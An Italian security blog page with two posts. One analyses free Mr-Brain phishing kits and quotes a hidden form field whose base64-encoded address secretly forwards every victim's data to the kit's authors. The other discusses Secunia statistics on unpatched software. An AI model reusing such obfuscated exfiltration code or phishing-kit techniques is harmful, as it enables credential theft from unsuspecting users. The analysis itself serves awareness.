L’equo compenso dei Phisher

Custom PHP scam scriptPremetto subito che la notizia non è nuova, credo però, che sia degna di nota.

Un gruppo che si fa chiamare Mr-Brain ha rilasciato dei tool, scritti in PHP, utili a chi vuole cimentarsi in truffe a mezzo phishing. Il sito Web del gruppo offre versioni diverse degli script in base al servizio da “impersonare”: eBay, PayPal, Bank of America, ecc..

I tool sono stati scritti in modo da permetterne l’uso a chi di PHP non ne sa niente: è necessario solamente inserire la propria e-mail per ricevere i dati sensibili inseriti da ogni vittima.

I tool-kit possono essere scaricati senza sborsare denaro. Quest’ultima caratteristica e l’immediatezza d’uso hanno permesso una larga diffusione nel mondo di phisher in erba, tanto che ne erano già state individuate tracce all’inizio dell’anno.

Chi pensa che i ragazzi di Mr-Brain hanno rilasciato questi script solo per la gloria o per il gusto di sapere che verranno usati per colpire utenti non molto smaliziati sbaglia di grosso. L’idea, simpatica, degli autori è quella di prendersi un equo compenso da ogni copia usata un po come fa la cara e vecchia SIAE.

Questa è la parte di codice che si occupa della raccolta di tutti i dati inseriti dalla vittima per poi inviarli via mail:

Double mail function

Notate niente di strano?

La funzione mail() è ripetuta due volte utilizzando due nomi variabili diversi, anche se solo per la prima lettera.
Il valore della prima variabile, quella con la “s” minuscola è definibile dal phiser, mentre il valore della seconda variabile, quella con la “S” maiuscola, è settato tramite un campo del form di raccolta dati. il valore di tale campo è stato offuscato codificandolo in base64:

<input type=”hidden” name=”Send” value=”<?=base64_decode(“TXItQnJhaW5ARXZpbC1CcmFpbi5OZXQ=”);?>”>

In questo modo, i dati della vittima, oltre ad essere inoltrati a chi ha personalizzato lo script con la propria e-mail, verranno sempre inviati anche a un indirizzo di proprietà del gruppo Mr-Brain.
Che dire? Forse l’esperienza conta sempre.

 

Applicazioni installate e non aggiornate

Worms competition

Secondo Secunia, il 20% delle applicazioni installate su Windows non sono aggiornate.
Facciamo un passo indietro. Secunia distribuisce gratuitamente un tool chiamato PSI il quale ricerca tutti i software che non sono aggiornati in termini di patch di sicurezza.
Il rapporto dichiarato è basato su un campione di 14.500.000 applicazioni controllate nei PC degli utenti che utilizzano PSI.

A conti fatti il un quinto di tutte le applicazioni installate ha almeno un problema di sicurezza. Quanti utenti utilizzano il PC per lavoro o per hobby? Quanti di questi conoscono Secunia o i problemi di sicurezza derivanti ad esempio da “privilege escalation” o “remote exploit“?

Penso, purtroppo, che quel dato sia sottostimato altrimenti non mi so spiegare i livelli di successo di bot-net e worm. Si veda in proposito il numero di PC infettati dal “Storm Worm” nelle vacanze natalizie e l’ultimo report di Symantec su bot-net e computer zombie.

Credo poco alle statistiche: molte volte sono volutamente alterate altre sono invece calcolate su un campione “contaminato” che ne altera involontariamente il significato.